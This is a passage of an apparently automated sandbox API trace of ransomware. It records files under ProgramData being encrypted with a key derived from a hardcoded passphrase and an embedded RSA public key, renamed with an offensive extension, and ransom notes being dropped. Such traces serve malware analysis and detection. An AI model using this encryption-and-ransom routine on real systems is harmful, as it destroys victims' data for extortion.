(lpExistingFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.017.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.017.etl.gsg"), lpNewFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.017.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.017.etl"), bFailIfExists=0) returned 0 [0238.622] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.017.etl", dwFileAttributes=0x2000) returned 0 [0238.622] DeleteFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.017.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.017.etl.gsg")) returned 1 [0238.623] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.017.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.017.etl"), lpNewFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.017.etl.fuck" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.017.etl.fuck")) returned 0 [0238.624] CryptDestroyHash (hHash=0x282e238) returned 1 [0238.624] CryptDestroyKey (hKey=0x282e338) returned 1 [0238.624] CryptReleaseContext (hProv=0x287fb98, dwFlags=0x0) returned 1 [0238.624] FindNextFileA (in: hFindFile=0x27ea990, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.624] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f070 | out: lpSystemTimeAsFileTime=0x2b9f070) [0238.624] GetLastError () returned 0x5 [0238.624] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.018.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.018.etl")) returned 0x2020 [0238.625] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.018.etl", dwFileAttributes=0x80) returned 0 [0238.625] CreateFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.018.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.018.etl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.626] CreateFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.018.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.018.etl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0238.626] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.018.etl.gsg", dwFileAttributes=0x2) returned 1 [0238.627] CryptAcquireContextA (in: phProv=0x2b9e06c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e06c*=0x287fb98) returned 1 [0238.629] CryptCreateHash (in: hProv=0x287fb98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e070 | out: phHash=0x2b9e070) returned 1 [0238.629] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.629] CryptHashData (hHash=0x282e0f8, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.629] CryptDeriveKey (in: hProv=0x287fb98, Algid=0x6610, hBaseData=0x282e0f8, dwFlags=0x1000000, phKey=0x2b9e05c | out: phKey=0x2b9e05c*=0x282dfb8) returned 1 [0238.629] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.629] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e078, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054 | out: pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054) returned 1 [0238.629] CryptAcquireContextA (in: phProv=0x2b9e068, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e068*=0x2880fc8) returned 1 [0238.630] CryptImportPublicKeyInfo (in: hCryptProv=0x2880fc8, dwCertEncodingType=0x1, pInfo=0x286a7d8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x286a808*, PublicKey.cbData=0x8c, PublicKey.pbData=0x286a810*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e060 | out: phKey=0x2b9e060*=0x282de38) returned 1 [0238.630] CryptEncrypt (in: hKey=0x282de38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e050*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e050*=0x80) returned 1 [0238.630] CryptEncrypt (in: hKey=0x282de38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2880b88*, pdwDataLen=0x2b9e064*=0x18, dwBufLen=0x80 | out: pbData=0x2880b88*, pdwDataLen=0x2b9e064*=0x80) returned 1 [0238.630] WriteFile (in: hFile=0x5d10, lpBuffer=0x2880b88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x2880b88*, lpNumberOfBytesWritten=0x2b9e074*=0x80, lpOverlapped=0x0) returned 1 [0238.631] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9e074*=0x0, lpOverlapped=0x0) returned 0 [0238.631] CryptEncrypt (in: hKey=0x282dfb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x10) returned 1 [0238.631] WriteFile (in: hFile=0x5d10, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9e074*=0x10, lpOverlapped=0x0) returned 1 [0238.631] CloseHandle (hObject=0xffffffff) returned 1 [0238.632] CloseHandle (hObject=0x5d10) returned 1 [0238.632] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.018.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.018.etl.gsg"), lpNewFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.018.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.018.etl"), bFailIfExists=0) returned 0 [0238.636] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.018.etl", dwFileAttributes=0x2000) returned 0 [0238.636] DeleteFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.018.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.018.etl.gsg")) returned 1 [0238.638] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.018.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.018.etl"), lpNewFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.018.etl.fuck" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.018.etl.fuck")) returned 0 [0238.638] CryptDestroyHash (hHash=0x282e0f8) returned 1 [0238.638] CryptDestroyKey (hKey=0x282dfb8) returned 1 [0238.638] CryptReleaseContext (hProv=0x287fb98, dwFlags=0x0) returned 1 [0238.638] FindNextFileA (in: hFindFile=0x27ea990, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.638] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f070 | out: lpSystemTimeAsFileTime=0x2b9f070) [0238.638] GetLastError () returned 0x5 [0238.638] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.019.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.019.etl")) returned 0x2020 [0238.639] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.019.etl", dwFileAttributes=0x80) returned 0 [0238.639] CreateFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.019.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.019.etl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.639] CreateFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.019.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.019.etl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0238.640] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.019.etl.gsg", dwFileAttributes=0x2) returned 1 [0238.640] CryptAcquireContextA (in: phProv=0x2b9e06c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e06c*=0x287fb98) returned 1 [0238.642] CryptCreateHash (in: hProv=0x287fb98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e070 | out: phHash=0x2b9e070) returned 1 [0238.642] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.642] CryptHashData (hHash=0x282e0f8, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.642] CryptDeriveKey (in: hProv=0x287fb98, Algid=0x6610, hBaseData=0x282e0f8, dwFlags=0x1000000, phKey=0x2b9e05c | out: phKey=0x2b9e05c*=0x282e338) returned 1 [0238.642] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.642] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e078, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054 | out: pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054) returned 1 [0238.643] CryptAcquireContextA (in: phProv=0x2b9e068, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e068*=0x2881518) returned 1 [0238.643] CryptImportPublicKeyInfo (in: hCryptProv=0x2881518, dwCertEncodingType=0x1, pInfo=0x286a8a8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x286a8d8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x286a8e0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e060 | out: phKey=0x2b9e060*=0x282e138) returned 1 [0238.643] CryptEncrypt (in: hKey=0x282e138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e050*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e050*=0x80) returned 1 [0238.643] CryptEncrypt (in: hKey=0x282e138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2881160*, pdwDataLen=0x2b9e064*=0x18, dwBufLen=0x80 | out: pbData=0x2881160*, pdwDataLen=0x2b9e064*=0x80) returned 1 [0238.643] WriteFile (in: hFile=0x5d10, lpBuffer=0x2881160*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x2881160*, lpNumberOfBytesWritten=0x2b9e074*=0x80, lpOverlapped=0x0) returned 1 [0238.644] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9e074*=0x0, lpOverlapped=0x0) returned 0 [0238.644] CryptEncrypt (in: hKey=0x282e338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x10) returned 1 [0238.644] WriteFile (in: hFile=0x5d10, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9e074*=0x10, lpOverlapped=0x0) returned 1 [0238.644] CloseHandle (hObject=0xffffffff) returned 1 [0238.644] CloseHandle (hObject=0x5d10) returned 1 [0238.647] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.019.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.019.etl.gsg"), lpNewFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.019.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.019.etl"), bFailIfExists=0) returned 0 [0238.652] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.019.etl", dwFileAttributes=0x2000) returned 0 [0238.653] DeleteFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.019.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.019.etl.gsg")) returned 1 [0238.654] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.019.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.019.etl"), lpNewFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.019.etl.fuck" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.019.etl.fuck")) returned 0 [0238.654] CryptDestroyHash (hHash=0x282e0f8) returned 1 [0238.654] CryptDestroyKey (hKey=0x282e338) returned 1 [0238.655] CryptReleaseContext (hProv=0x287fb98, dwFlags=0x0) returned 1 [0238.655] FindNextFileA (in: hFindFile=0x27ea990, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.655] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f070 | out: lpSystemTimeAsFileTime=0x2b9f070) [0238.655] GetLastError () returned 0x5 [0238.655] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateUx.001.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updateux.001.etl")) returned 0x2020 [0238.655] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateUx.001.etl", dwFileAttributes=0x80) returned 1 [0238.656] CreateFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateUx.001.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updateux.001.etl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0238.656] CreateFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateUx.001.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updateux.001.etl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d18 [0238.656] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateUx.001.etl.gsg", dwFileAttributes=0x2) returned 1 [0238.657] CryptAcquireContextA (in: phProv=0x2b9e06c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e06c*=0x287fb98) returned 1 [0238.659] CryptCreateHash (in: hProv=0x287fb98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e070 | out: phHash=0x2b9e070) returned 1 [0238.659] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.659] CryptHashData (hHash=0x282df78, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.659] CryptDeriveKey (in: hProv=0x287fb98, Algid=0x6610, hBaseData=0x282df78, dwFlags=0x1000000, phKey=0x2b9e05c | out: phKey=0x2b9e05c*=0x282ddf8) returned 1 [0238.659] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.659] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e078, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054 | out: pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054) returned 1 [0238.659] CryptAcquireContextA (in: phProv=0x2b9e068, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e068*=0x28815a0) returned 1 [0238.660] CryptImportPublicKeyInfo (in: hCryptProv=0x28815a0, dwCertEncodingType=0x1, pInfo=0x286bc28*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x286bc58*, PublicKey.cbData=0x8c, PublicKey.pbData=0x286bc60*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e060 | out: phKey=0x2b9e060*=0x282e038) returned 1 [0238.660] CryptEncrypt (in: hKey=0x282e038, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e050*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e050*=0x80) returned 1 [0238.660] CryptEncrypt (in: hKey=0x282e038, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2881490*, pdwDataLen=0x2b9e064*=0x18, dwBufLen=0x80 | out: pbData=0x2881490*, pdwDataLen=0x2b9e064*=0x80) returned 1 [0238.660] WriteFile (in: hFile=0x5d18, lpBuffer=0x2881490*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x2881490*, lpNumberOfBytesWritten=0x2b9e074*=0x80, lpOverlapped=0x0) returned 1 [0238.661] ReadFile (in: hFile=0x5d10, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9e074*=0x380, lpOverlapped=0x0) returned 1 [0238.677] CryptEncrypt (in: hKey=0x282ddf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x380) returned 1 [0238.677] WriteFile (in: hFile=0x5d18, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9e074*=0x380, lpOverlapped=0x0) returned 1 [0238.699] ReadFile (in: hFile=0x5d10, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9e074*=0x380, lpOverlapped=0x0) returned 1 [0238.699] CryptEncrypt (in: hKey=0x282ddf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x380) returned 1 [0238.699] WriteFile (in: hFile=0x5d18, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9e074*=0x380, lpOverlapped=0x0) returned 1 [0238.700] ReadFile (in: hFile=0x5d10, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9e074*=0x380, lpOverlapped=0x0) returned 1 [0238.700] CryptEncrypt (in: hKey=0x282ddf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x380) returned 1 [0238.700] WriteFile (in: hFile=0x5d18, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9e074*=0x380, lpOverlapped=0x0) returned 1 [0238.700] ReadFile (in: hFile=0x5d10, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9e074*=0x380, lpOverlapped=0x0) returned 1 [0238.700] CryptEncrypt (in: hKey=0x282ddf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x380) returned 1 [0238.700] WriteFile (in: hFile=0x5d18, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9e074*=0x380, lpOverlapped=0x0) returned 1 [0238.700] ReadFile (in: hFile=0x5d10, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9e074*=0x200, lpOverlapped=0x0) returned 1 [0238.700] CryptEncrypt (in: hKey=0x282ddf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x200, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x210) returned 1 [0238.700] WriteFile (in: hFile=0x5d18, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x210, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9e074*=0x210, lpOverlapped=0x0) returned 1 [0238.700] CloseHandle (hObject=0x5d10) returned 1 [0238.700] CloseHandle (hObject=0x5d18) returned 1 [0238.701] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateUx.001.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updateux.001.etl.gsg"), lpNewFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateUx.001.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updateux.001.etl"), bFailIfExists=0) returned 1 [0238.705] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateUx.001.etl", dwFileAttributes=0x2000) returned 1 [0238.705] DeleteFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateUx.001.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updateux.001.etl.gsg")) returned 1 [0238.707] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateUx.001.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updateux.001.etl"), lpNewFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateUx.001.etl.fuck" (normalized: "c:\\programdata\\usoshared\\logs\\updateux.001.etl.fuck")) returned 1 [0238.709] CryptDestroyHash (hHash=0x282df78) returned 1 [0238.709] CryptDestroyKey (hKey=0x282ddf8) returned 1 [0238.709] CryptReleaseContext (hProv=0x287fb98, dwFlags=0x0) returned 1 [0238.709] FindNextFileA (in: hFindFile=0x27ea990, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0 [0238.709] FindClose (in: hFindFile=0x27ea990 | out: hFindFile=0x27ea990) returned 1 [0238.709] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\usoshared\\logs\\readme_back_files.htm")) returned 0xffffffff [0238.709] AreFileApisANSI () returned 1 [0238.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd7c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0238.710] CreateFileW (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\usoshared\\logs\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f2e4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d08 [0238.710] GetFileType (hFile=0x5d08) returned 0x1 [0238.710] WriteFile (in: hFile=0x5d08, lpBuffer=0x2b9df30*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9df28, lpOverlapped=0x0 | out: lpBuffer=0x2b9df30*, lpNumberOfBytesWritten=0x2b9df28*=0x5ec, lpOverlapped=0x0) returned 1 [0238.711] FindNextFileA (in: hFindFile=0x27ea8d0, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0 [0238.711] FindClose (in: hFindFile=0x27ea8d0 | out: hFindFile=0x27ea8d0) returned 1 [0238.711] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\usoshared\\readme_back_files.htm")) returned 0xffffffff [0238.712] AreFileApisANSI () returned 1 [0238.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x39be90, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0238.712] CreateFileW (lpFileName="C:\\\\ProgramData\\USOShared\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\usoshared\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cdc [0238.712] GetFileType (hFile=0x5cdc) returned 0x1 [0238.712] WriteFile (in: 